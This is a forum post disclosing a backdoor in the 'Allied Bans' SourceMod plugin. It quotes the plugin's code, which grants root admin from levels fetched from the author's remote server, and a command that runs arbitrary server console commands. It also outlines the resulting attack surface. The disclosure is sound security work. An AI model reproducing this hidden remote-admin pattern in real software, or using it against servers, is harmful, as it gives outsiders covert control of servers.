I spoke with asherkin about this before, as a few different people have brought up this plugin in the past, and I warn them each time about using it when I hear about it. Anyways, this newer version did not change anything, basically the author just left in the remote admin flags, but did so in a more subtle way:
PHP Code:
stock bool:IsRootAdmin(client)
{
if (client == 0) return true;
if (Level[client] >= 495) return true;
return false;
}
So it used to query his db server with a password, but he switched to socket...
PHP Code:
public HandleTAG(String:receiveData[], client) {
//Parse String
decl String:tagdata[12][128];
decl String:tagarray[12][256];
decl String:clientAuth[64],String:bSteamID[64],String:sServername[64],String:sFlag[16];
decl String:tTagcolor[128], String:tNickcolor[128], String:tChatcolor[128];
decl String:leveldata[4][32];
GetClientAuthString(client, clientAuth, sizeof(clientAuth));
if (StrContains(receiveData, "!ABLEVEL!", false) >= 0) {
ExplodeString(receiveData,"!ABLEVEL!",leveldata,sizeof(leveldata),sizeof(leveldata[]));
Format(bSteamID, sizeof(bSteamID), leveldata[1]);
if (StrEqual(bSteamID, clientAuth, false) == true) {
new mylevel = StringToInt(leveldata[2]);
Level[client] = mylevel;
new String:Message[128];
Format(Message, sizeof(Message), "Your Clearance is LEVEL %d", mylevel);
PrintToTarget(client, Message);
}
}
Now that's great and all, but let's not forget this little gem:
PHP Code:
public Action:Command_Command(client, args)
{
if (!IsRootAdmin(client)) {
ReplyToCommand(client, "[AlliedBANS] You have no access to this command");
return Plugin_Handled;
}
if(args < 1)
{
ReplyToCommand(client, "[AlliedBANS] SYNTAX : sm_ab_command <command>");
ReplyToCommand(client, "[AlliedBANS] USE TO KICK BANNED USERS WHO DO NOT GET KICKED AUTOMATICALLY");
return Plugin_Handled;
}
new String:Commands[512];
GetCmdArgString(Commands, sizeof(Commands));
if (client == 0) // They will already see the response in the console.
{
ServerCommand("%s", Commands);
} else {
decl String:responseBuffer[4096];
decl String:exploded[256][16];
ServerCommandEx(responseBuffer, sizeof(responseBuffer), "%s", Commands);
new segments = ExplodeString(responseBuffer, "\n", exploded, 16, 256, false);
if (segments > 0) {
ReplyToCommand(client, "### Start ###");
for (new i = 0; i < segments; i++) {
ReplyToCommand(client, "%s\n", exploded[i]);
}
ReplyToCommand(client, "### End ###");
}
ReplyToCommand(client, responseBuffer);
}
return Plugin_Handled;
}
new mylevel = StringToInt(leveldata[2]);
grabs the player's "level" from his database, preivously, when I logged in and queried his database to get the levels of all of the players, there were some 20+ individuals that would have been "given" root access alone (note that this was as ~4 months ago, so the user list may have changed). Though, anyone could be added at any time, since it basically just queries that db (which you have no control over). Also since this thing just queries tommy.or.kr via tcp to get this info, any attacker could use simple DNS hijacking to gain access (though perhaps unlikely)
I spoke with asherkin and got this response:
Quote:
05-12-14 , 08:22 AM Allied Bans (Kr)
Hey friagram,
Whoah! This one looks like it could be a mess.
I've moved your thread into a private forum for a bit while I look at it - the scope is quite massive and could be dire.
Thanks for the notice, I'll make the thread public again once we've got a better grasp of what's going on.
I noticed you're currently editing the thread, that'll probably fail - just PM me if there's anything else you'd like to add.
Regards,
Asher
|
and again:
Quote:
05-12-14 , 10:58 AM Re: Allied Bans (Kr)
Originally Posted by friagram
I didn't spend tons of time looking it over, but from what I saw and heared, there's a fair amount of people that run it. I told my Korean friends to just not use it, but they said that then all of the hackers/spammers/scammers would then start coming to their servers. Anyways, hard to tell looking at the queries just how many people use it, since I can't really query everything or dump the structure.
I had a long discussion with the author earlier, he's working towards getting an update out with full source code and less questionable admin access bits.
Thanks again,
Asher
|
As per the rcon/socket/updater mentions. While perhaps unlikely, this particular combination does create an enormous attack surface as you have:
1) admin
2) console access
3) ability to update plugins and thus use the entire sourcemod API to modify the filesystem
4) socket to do anything you want via TCP/UDP
So.. it would technically be possible for them to update the plugin, install other plugins/extensions, programs... Delete files that are not protected by the user. Perhaps even run system commands if your user privileges are not locked down.
__________________